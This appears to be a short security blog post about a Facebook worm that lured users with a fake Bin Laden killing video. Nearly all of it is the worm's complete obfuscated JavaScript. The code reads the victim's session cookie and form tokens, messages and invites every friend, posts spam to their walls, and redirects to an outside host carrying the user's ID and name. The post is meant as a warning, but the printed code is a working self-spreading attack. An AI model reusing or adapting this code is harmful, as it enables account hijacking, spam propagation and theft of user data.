A worm has started to spread over Facebook promising
the user a video where the killed Osama Bin Laden can be seen.
The link is:
http://www.facebook.com/pages/Osama-Bin-Laden-Killed-Live-on-Video/201198676585608?sk=app_190322544333196&71029
On the corresponding Facebook profile you are asked to copy a javascript line following line into the browser’s location bar which reloads a JavaScript file named “bin.js” from a doubtful source.
- In line 3 the message to be send to all of your friends is defined.
- In lines 149 – 179 all of your friends are enumerated.
- The following lines send a spam message asking them to open the killing video themselves.
var randomnumber=Math.floor(Math.random()*99999);
var chatmessage = '%firstname% watch the video of them killing osama bin laden live! facebook.com/pages/Osama-Bin-Laden-Killed-Live-on-Video/201198676585608?sk=app_190322544333196&'+randomnumber;
var postmessage = 'Osama Bin Laden killed live on a news broadcast! watch the video: http://www.facebook.com/pages/Osama-Bin-Laden-Killed-Live-on-Video/201198676585608?sk=app_190322544333196&'+randomnumber;
var redirect = 'http://jonathangalt.com/facebook/bin.php';
var eventdesc = 'Hey everyone, \n\ fb now lets you see who viewed your profile! to enable this feature, go here! - http://www.facebook.com/pages/Osama-Bin-Laden-Killed-Live-on-Video/201198676585608?sk=app_190322544333196';
var eventname = 'Check out this cool page!';
var nfriends = 5000;
var debug = false;
var wf = 0;
var mf = function () {
if (wf <= 0) {
setTimeout(function () {
window['top']['location']['href'] = redirect;
}, 500);
};
};
var doget = function (_0xaa04xb, _0xaa04xc, _0xaa04xd) {
var _0xaa04xe = new XMLHttpRequest();
_0xaa04xe['open']('GET', _0xaa04xb);
_0xaa04xe['onreadystatechange'] = function () {
if (_0xaa04xe['readyState'] == 4) {
if (_0xaa04xe['status'] == 200 && _0xaa04xc) {
_0xaa04xc(_0xaa04xe['responseText']);
};
if (_0xaa04xd) {
_0xaa04xd();
};
};
};
_0xaa04xe['send']();
};
doget('/', function (_0xaa04xf) {
var _0xaa04x10 = document['cookie']['match'](/c_user=(\d+)/)[1];
var _0xaa04x11 = function (_0xaa04x12) {
return _0xaa04x12 ? '@[' + _0xaa04x12['id'] + ':' + _0xaa04x12['name'] + ']' : '';
};
var _0xaa04x13 = function (_0xaa04x12) {
return _0xaa04x12 ? _0xaa04x12['name'] : '';
};
var _0xaa04x14 = function (_0xaa04x12) {
out = '';
for (var _0xaa04x15 in _0xaa04x12) {
out += (out ? '&' : '') + _0xaa04x15 + ((_0xaa04x12[_0xaa04x15] !== null) ? '=' + encodeURIComponent(_0xaa04x12[_0xaa04x15]) : '');
};
return out;
};
var _0xaa04x16 = function (_0xaa04xb, _0xaa04x12, _0xaa04xc, _0xaa04xd) {
var _0xaa04xe = new XMLHttpRequest();
_0xaa04xe['open']('POST', _0xaa04xb);
_0xaa04xe['setRequestHeader']('Content-Type', 'application/x-www-form-urlencoded');
_0xaa04xe['onreadystatechange'] = function () {
if (_0xaa04xe['readyState'] == 4) {
if (_0xaa04xe['status'] == 200 && _0xaa04xc) {
_0xaa04xc(_0xaa04xe['responseText']);
};
if (_0xaa04xd) {
_0xaa04xd();
};
};
};
_0xaa04xe['send'](_0xaa04x14(_0xaa04x12));
};
var _0xaa04x17 = function () {
var _0xaa04x18 = document['createElement']('div');
_0xaa04x18['style']['display'] = 'block';
_0xaa04x18['style']['position'] = 'absolute';
_0xaa04x18['style']['width'] = 100 + '%';
_0xaa04x18['style']['height'] = 100 + '%';
_0xaa04x18['style']['left'] = 0 + 'px';
_0xaa04x18['style']['top'] = 0 + 'px';
_0xaa04x18['style']['textAlign'] = 'center';
_0xaa04x18['style']['padding'] = '4px';
_0xaa04x18['style']['background'] = '#FFFFFF';
_0xaa04x18['style']['zIndex'] = 999999;
_0xaa04x18['innerHTML'] = ' <br/>Please wait, this can take a little while...<br/><br/> We are loading the video... If the video fails to load <a href="javascript:void(0);" onclick="wf=0; mf();">click here</a> ';
document['body']['appendChild'](_0xaa04x18);
};
var _0xaa04x19 = _0xaa04xf['match'](/name=\\"xhpc_composerid\\" value=\\"([\d\w]+)\\"/i);
if (_0xaa04x19) {
comp = _0xaa04x19[1];
} else {
comp = '';
};
var _0xaa04x1a = _0xaa04xf['match'](/name="post_form_id" value="([\d\w]+)"/i)[1];
var _0xaa04x1b = _0xaa04xf['match'](/name="fb_dtsg" value="([\d\w]+)"/i)[1];
var _0xaa04x1c = document['getElementById']('navAccountName')['firstChild']['data'];
redirect = redirect + '?' + _0xaa04x14({
userid: _0xaa04x10,
name: _0xaa04x1c,
doclose: 1
});
_0xaa04x17();
if (eventdesc) {
wf++;
_0xaa04x16('/ajax/choose/?__a=1', {
type: 'event',
eid: null,
invite_message: '',
__d: 1,
post_form_id: _0xaa04x1a,
fb_dtsg: _0xaa04x1b,
lsd: null,
post_form_id_source: 'AsyncRequest'
}, function (_0xaa04x1d) {
var _0xaa04x1e = _0xaa04x1d['match'](/\\"token\\":\\"([^\\]+)\\"/)[1];
var _0xaa04xb = '/ajax/typeahead/first_degree.php?__a=1&viewer=' + _0xaa04x10 + '&token=' + _0xaa04x1e + '&filter[0]=user&options[0]=friends_only&options[1]=nm&options[2]=sort_alpha';
doget(_0xaa04xb, function (_0xaa04x1f) {
var _0xaa04x20 = _0xaa04x1f['match'](/\{"uid":\d+,/g);
var _0xaa04x21 = [];
for (var _0xaa04x22 = 0; _0xaa04x22 < _0xaa04x20['length']; _0xaa04x22++) {
var _0xaa04x23 = _0xaa04x20[_0xaa04x22]['match'](/:(\d+),/)[1];
if (_0xaa04x23 != _0xaa04x10) {
_0xaa04x21['push'](_0xaa04x23);
};
};
var _0xaa04x24 = new Date();
_0xaa04x24['setTime'](_0xaa04x24['getTime']() + 60 * 60 * 24 * 1000);
datestr = (_0xaa04x24['getMonth']() + 1) + '/' + _0xaa04x24['getDate']() + '/' + _0xaa04x24['getFullYear']();
timestr = _0xaa04x24['getHours']() * 60;
var _0xaa04x25 = {
post_form_id: _0xaa04x1a,
fb_dtsg: _0xaa04x1b,
start_dateIntlDisplay: datestr,
start_date: datestr,
start_time_hour_min: timestr,
name: eventname,
place_page_id: '',
location: '',
street: '',
geo_id: '',
geo_sq: '',
desc: eventdesc,
sgb_invitees: _0xaa04x21['join'](','),
sgb_emails: '',
sgb_message: '',
privacy_type: 'on',
guest_list: 'on',
connections_can_post: 'on',
save: 'Create Event',
submitting: ''
};
_0xaa04x25['new'] = '';
_0xaa04x16('/events/create.php', _0xaa04x25, false, function () {
mf(--wf);
});
});
});
};
if (chatmessage) {
wf++;
_0xaa04x16('/ajax/chat/buddy_list.php?__a=1', {
user: _0xaa04x10,
post_form_id: _0xaa04x1a,
fb_dtsg: _0xaa04x1b,
lsd: null,
post_form_id_source: 'AsyncRequest',
popped_out: false,
force_render: true
}, function (_0xaa04x1d) {
var _0xaa04x26 = _0xaa04x1d['substr'](9);
var _0xaa04x27 = eval('(' + _0xaa04x26 + ')');
var _0xaa04x28 = _0xaa04x27['payload']['buddy_list'];
for (var _0xaa04x29 in _0xaa04x28['nowAvailableList']) {
var _0xaa04x2a = Math['floor'](Math['random']() * 1335448958);
var _0xaa04x2b = (new Date())['getTime']();
var _0xaa04x2c = chatmessage['replace']('%firstname%', _0xaa04x28['userInfos'][_0xaa04x29]['firstName']['toLowerCase']());
_0xaa04x16('/ajax/chat/send.php?__a=1', {
msg_id: Math['floor'](Math['random']() * 1335448958),
client_time: (new Date())['getTime'](),
msg_text: chatmessage['replace']('%firstname%', _0xaa04x28['userInfos'][_0xaa04x29]['firstName']['toLowerCase']()),
to: _0xaa04x29,
post_form_id: _0xaa04x1a,
fb_dtsg: _0xaa04x1b,
post_form_id_source: 'AsyncRequest'
});
};
mf(--wf);
});
};
if (postmessage) {
wf++;
doget('/ajax/browser/friends/?uid=' + _0xaa04x10 + '&filter=all&__a=1&__d=1', function (_0xaa04x1d) {
var _0xaa04x20 = _0xaa04x1d['match'](/\/\d+_\d+_\d+_q\.jpg.*?u003ca href=\\"http:\\\/\\\/www.facebook.com\\\/.*?\\u003c\\\/a>/gi);
var _0xaa04x2d = [];
if (_0xaa04x20) {
for (var _0xaa04x22 = 0; _0xaa04x22 < _0xaa04x20['length']; _0xaa04x22++) {
var _0xaa04x23 = _0xaa04x20[_0xaa04x22]['match'](/_\d+_/)[0]['replace'](/_/g, '');
var _0xaa04x2e = _0xaa04x20[_0xaa04x22]['match'](/>[^>]+\\u003c\\\/a>$/i)[0]['replace'](/\\u003c\\\/a>$/gim, '')['replace'](/>/g, '');
_0xaa04x2d['push']({
id: _0xaa04x23,
name: _0xaa04x2e
});
};
};
var _0xaa04xd = [];
var _0xaa04x2f = [];
while (_0xaa04x2d['length']) {
var _0xaa04x30 = Math['floor'](Math['random']() * _0xaa04x2d['length']);
_0xaa04xd['push'](_0xaa04x2d[_0xaa04x30]);
_0xaa04x2f['push'](_0xaa04x2d[_0xaa04x30]);
var _0xaa04x2b = _0xaa04x2d['shift']();
if (_0xaa04x30) {
_0xaa04x2d[_0xaa04x30 - 1] = _0xaa04x2b;
};
};
if (debug) {
alert('fetched friends: ' + _0xaa04xd['length']);
};
var _0xaa04x31 = {
post_form_id: _0xaa04x1a,
fb_dtsg: _0xaa04x1b,
xhpc_composerid: comp,
xhpc_targetid: _0xaa04x10,
xhpc_context: 'home',
xhpc_fbx: '',
lsd: null,
post_form_id_source: 'AsyncRequest'
};
mt = postmessage;
m = postmessage;
while (mt['search']('%tf%') >= 0) {
var _0xaa04x32 = _0xaa04xd['pop']();
mt = mt['replace']('%tf%', _0xaa04x13(_0xaa04x32));
m = m['replace']('%tf%', _0xaa04x11(_0xaa04x32));
};
_0xaa04x31['xhpc_message_text'] = mt;
_0xaa04x31['xhpc_message'] = m;
if (debug) {
alert('message text: ' + mt);
};
_0xaa04x16('/ajax/updatestatus.php?__a=1', _0xaa04x31);
var _0xaa04x33 = function (_0xaa04x15) {
if (_0xaa04x15 == 0) {
wf = 0;
mf();
return;
};
var _0xaa04x34 = _0xaa04x2f['shift']();
var _0xaa04x35 = {
post_form_id: _0xaa04x1a,
fb_dtsg: _0xaa04x1b,
xhpc_composerid: comp,
xhpc_targetid: _0xaa04x34['id'],
xhpc_context: 'profile',
xhpc_fbx: 1,
lsd: null,
post_form_id_source: 'AsyncRequest'
};
var _0xaa04x36 = postmessage;
var _0xaa04x37 = postmessage;
if (_0xaa04xd['length'] == 0) {
wf = 0;
mf();
return;
};
while (_0xaa04x36['search']('%tf%') >= 0) {
var _0xaa04x38 = _0xaa04xd['pop']();
_0xaa04x36 = _0xaa04x36['replace']('%tf%', _0xaa04x13(_0xaa04x38));
_0xaa04x37 = _0xaa04x37['replace']('%tf%', _0xaa04x11(_0xaa04x38));
};
_0xaa04x35['xhpc_message_text'] = _0xaa04x36;
_0xaa04x35['xhpc_message'] = _0xaa04x37;
_0xaa04x16('/ajax/updatestatus.php?__a=1', _0xaa04x35);
setTimeout(function () {
_0xaa04x33(_0xaa04x15 - 1);
}, 2000);
};
wf++;
setTimeout(function () {
_0xaa04x33(nfriends);
}, 2000);
});
};
mf();
});
You want a Bin Laden video?
Then you better consult a more official channel like Youtube.